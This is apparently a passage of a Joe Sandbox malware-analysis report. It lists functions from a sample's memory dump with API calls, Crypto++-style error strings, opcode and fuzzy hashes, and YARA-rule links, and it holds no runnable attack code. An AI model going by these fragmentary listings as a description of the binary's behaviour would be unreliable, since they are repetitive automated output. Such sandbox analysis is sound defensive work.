                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction ID: 7a7af87eea557cbd9e3bb318d672390ce1f9e9d9d8fef4dd524434f54467e09b
                                                                                          • Opcode Fuzzy Hash: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction Fuzzy Hash: 90312A70E016189FEF10DB68CC80FAEB7FAAF95610F60458AE519E7241CB75D9818F50
                                                                                          Function 6D01FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction ID: 82042e11f4e339c90aeae474fe1da60ce2c73d96afc5258ea10fca6f5d67bea5
                                                                                          • Opcode Fuzzy Hash: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction Fuzzy Hash: 0B314F70E156189FDB10DFA9CD80BADB7FAAF85300F60458AE559EB241C775DE808F50
                                                                                          Function 6D01FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction ID: 8496f6c7498fd99c2f4716da319b2bcae23f6e1d7cced58a47237b93a9d336fb
                                                                                          • Opcode Fuzzy Hash: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction Fuzzy Hash: 47313E70E156189FDB10CFA9CC80BADB7FAAF89300F60468AE559EB241C775DE808F50
                                                                                          Function 6D0606A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004760: __CxxThrowException@8.LIBCMT ref: 6D0047F9
                                                                                          • _memmove.LIBCMT ref: 6D060907
                                                                                          • _memmove.LIBCMT ref: 6D060936
                                                                                          • _memmove.LIBCMT ref: 6D060959
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D060A25
                                                                                          Strings
                                                                                          • PSSR_MEM: message recovery disabled, xrefs: 6D0609E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                          • String ID: PSSR_MEM: message recovery disabled
                                                                                          • API String ID: 2655171816-3051149714
                                                                                          • Opcode ID: c2764a0da58f37d78243811c354ab6b28ac9f4e0f9750989aac4b1c75a6f24e7
                                                                                          • Instruction ID: b40c5409e8f6b9ef7d40058dc44c1b811e8ef740856b6fcef53b625b3e39c3a3
                                                                                          • Opcode Fuzzy Hash: c2764a0da58f37d78243811c354ab6b28ac9f4e0f9750989aac4b1c75a6f24e7
                                                                                          • Instruction Fuzzy Hash: 86C149756083819FE715CF29C880B6ABBE6BFC9304F148A5CE589C7385D774E905CBA2
                                                                                          Function 6D067FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0680EA
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Max$Min$RandomNumberType$invalid bit length
                                                                                          • API String ID: 3718517217-2498579642
                                                                                          • Opcode ID: 5b72ec63c837a0ca985210dc5a4054f92dcc58bbf0821b618e054021e312f500
                                                                                          • Instruction ID: 5c7975b108640208b23bd9601a84bf3b82eed18ee3b8ece20f00859ba0639a15
                                                                                          • Opcode Fuzzy Hash: 5b72ec63c837a0ca985210dc5a4054f92dcc58bbf0821b618e054021e312f500
                                                                                          • Instruction Fuzzy Hash: 04C18D7150C7809AF324CB28D850B9FB7E5BFDA304F464A6CE68983391EB749904C7A3
                                                                                          Function 6D06BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CreateFrameInfo.LIBCMT ref: 6D06BEB6
                                                                                            • Part of subcall function 6D06AB70: __getptd.LIBCMT ref: 6D06AB7E
                                                                                            • Part of subcall function 6D06AB70: __getptd.LIBCMT ref: 6D06AB8C
                                                                                          • __getptd.LIBCMT ref: 6D06BEC0
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06BECE
                                                                                          • __getptd.LIBCMT ref: 6D06BEDC
                                                                                          • __getptd.LIBCMT ref: 6D06BEE7
                                                                                          • _CallCatchBlock2.LIBCMT ref: 6D06BF0D
                                                                                            • Part of subcall function 6D06AC15: __CallSettingFrame@12.LIBCMT ref: 6D06AC61
                                                                                            • Part of subcall function 6D06BFB4: __getptd.LIBCMT ref: 6D06BFC3
                                                                                            • Part of subcall function 6D06BFB4: __getptd.LIBCMT ref: 6D06BFD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1602911419-0
                                                                                          • Opcode ID: a94c0e98cc74fb1e1aa979842c0074c99e09175d3ab8d82f04d57bfd3ac2b932
                                                                                          • Instruction ID: ada52eebf0e5bd3905d9f746b5a5c9944b63b1c3f0d0c63ad9ee25a30f70f8de
                                                                                          • Opcode Fuzzy Hash: a94c0e98cc74fb1e1aa979842c0074c99e09175d3ab8d82f04d57bfd3ac2b932
                                                                                          • Instruction Fuzzy Hash: A011F6B1C042499FEB00DFA4C944BEEBBB0FF44318F11846AFA14A7251EB789A109F60
                                                                                          Function 05CC0F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
                                                                                          • API String ID: 0-792669839
                                                                                          • Opcode ID: 4f19855670a99998c84fcd0b2d11c3f2b4ba8bff2c255c45bff46abf27587e5e
                                                                                          • Instruction ID: 640a6a1ab47b6c8b59cb805dd1169cf56a046f49c157a53a869d336734347919
                                                                                          • Opcode Fuzzy Hash: 4f19855670a99998c84fcd0b2d11c3f2b4ba8bff2c255c45bff46abf27587e5e
                                                                                          • Instruction Fuzzy Hash: C5A18274E002298FDB64DF69C994BD9BBB1BB48310F1485E9D50DAB361DB349E81CF50
                                                                                          Function 6D0370E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D037267
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                                          • API String ID: 2005118841-1273958906
                                                                                          • Opcode ID: 5e2cc546bc49d880b725e533f6c310a0bdc387ea0a0b734a0e3d764c5c595c85
                                                                                          • Instruction ID: 26e2647730f51db01cec584ea791804f1adc6e242221742644e0fcbc8b672903
                                                                                          • Opcode Fuzzy Hash: 5e2cc546bc49d880b725e533f6c310a0bdc387ea0a0b734a0e3d764c5c595c85
                                                                                          • Instruction Fuzzy Hash: 0261607110C381AFE321DB68C884FDFB7E9AF99304F054A1DE68D87242DB75990487A7
                                                                                          Function 6D05AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          • Opcode ID: 011b429633d453447b6a33fd4943ec7124e6e173af0141e5e3aeeaf509a6aa5d
                                                                                          • Instruction ID: 61c90f2f29fc2f3f9ed6205eb928f190cc813f94873272c0011d53aa5e9fc53a
                                                                                          • Opcode Fuzzy Hash: 011b429633d453447b6a33fd4943ec7124e6e173af0141e5e3aeeaf509a6aa5d
                                                                                          • Instruction Fuzzy Hash: F051D3752083415BE314CFA5C990F37BBEAAF85348F144A1DF9DA8B292D722F8198761
                                                                                          Function 6D03A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          • Opcode ID: 7478201765bfd9223793589a90083a7ccc2220265346616d1fe1523b870be1d5
                                                                                          • Instruction ID: 7b224b46fbef0d4c801bf90742cee139dc08dca51ed91ebe4092c6dc567dedd1
                                                                                          • Opcode Fuzzy Hash: 7478201765bfd9223793589a90083a7ccc2220265346616d1fe1523b870be1d5
                                                                                          • Instruction Fuzzy Hash: 1851E6312083525BF714CFA4D894F77B7EAAFC6348F164A5CF5DA8B282D762E8088751
                                                                                          Function 6D05B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          • Opcode ID: 21fcf0f1fc4a00a463e28c6acee3ca59d26cfe8080c02f382c25cead284621ae
                                                                                          • Instruction ID: b294db024597135f54029ac2fa0e508e322db550a57a5327976397ed9e0d4a83
                                                                                          • Opcode Fuzzy Hash: 21fcf0f1fc4a00a463e28c6acee3ca59d26cfe8080c02f382c25cead284621ae
                                                                                          • Instruction Fuzzy Hash: 8B51F4712083455BF710CF64D990B77BBEAAF86318F054A1CF9DA8B282D7A2F819C751
                                                                                          Function 6D041B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041C1A
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041CDE
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041D3E
                                                                                          Strings
                                                                                          • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6D041C67
                                                                                          • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6D041CF0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                                                                          • API String ID: 3476068407-3371871069
                                                                                          • Opcode ID: e56582df0ff1a4b09d44adfac002f0e5b8e83867343014115be5c7662308734d
                                                                                          • Instruction ID: 2903d2b625cc91b5cd7078eb305d172e248172613f6463e5491913d965691566
                                                                                          • Opcode Fuzzy Hash: e56582df0ff1a4b09d44adfac002f0e5b8e83867343014115be5c7662308734d
                                                                                          • Instruction Fuzzy Hash: AD513D75208741AFE324DF58C880F9AB7E9BFCC314F10891DE68987391DB74E9058BA2
                                                                                          Function 6D004010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
